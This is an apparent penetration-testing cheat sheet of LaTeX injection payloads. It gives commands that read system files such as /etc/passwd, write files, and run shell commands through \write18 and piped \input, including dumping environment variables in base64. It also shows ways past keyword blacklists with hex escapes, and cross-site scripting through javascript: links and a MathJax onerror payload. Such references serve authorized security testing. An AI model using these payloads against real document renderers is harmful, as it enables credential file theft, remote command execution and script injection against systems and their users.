Skip to content

LaTex Injection

You might need to adjust injection with wrappers as \[ or $.

Read file

Read file and interpret the LaTeX code in it:

\input{/etc/passwd}
\include{somefile} # load .tex file (somefile.tex)

Read single lined file:

\newread\file
\openin\file=/etc/issue
\read\file to\line
\text{\line}
\closein\file

Read multiple lined file:

\lstinputlisting{/etc/passwd}
\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
    \read\file to\fileline
    \text{\fileline}
\repeat
\closein\file

Read text file, without interpreting the content, it will only paste raw file content:

\usepackage{verbatim}
\verbatiminput{/etc/passwd}

If injection point is past document header (\usepackage cannot be used), some control characters can be deactivated in order to use \input on file containing $, #, _, &, null bytes, ... (eg. perl scripts).

\catcode `\$=12
\catcode `\#=12
\catcode `\_=12
\catcode `\&=12
\input{path_to_script.pl}

To bypass a blacklist try to replace one character with it's unicode hex value. - ^^41 represents a capital A - ^^7e represents a tilde (~) note that the ā€˜eā€™ must be lower case

\lstin^^70utlisting{/etc/passwd}

Write file

Write single lined file:

\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\write\outfile{Line 2}
\write\outfile{I like trains}
\closeout\outfile

Command execution

The output of the command will be redirected to stdout, therefore you need to use a temp file to get it.

\immediate\write18{id > output}
\input{output}

If you get any LaTex error, consider using base64 to get the result without bad characters (or use \verbatiminput):

\immediate\write18{env | base64 > test.tex}
\input{text.tex}
\input|ls|base64
\input{|"/bin/hostname"}

Cross Site Scripting

From @EdOverflow

\url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder}

in mathjax

\unicode{<img src=1 onerror="<ARBITRARY_JS_CODE>">}

References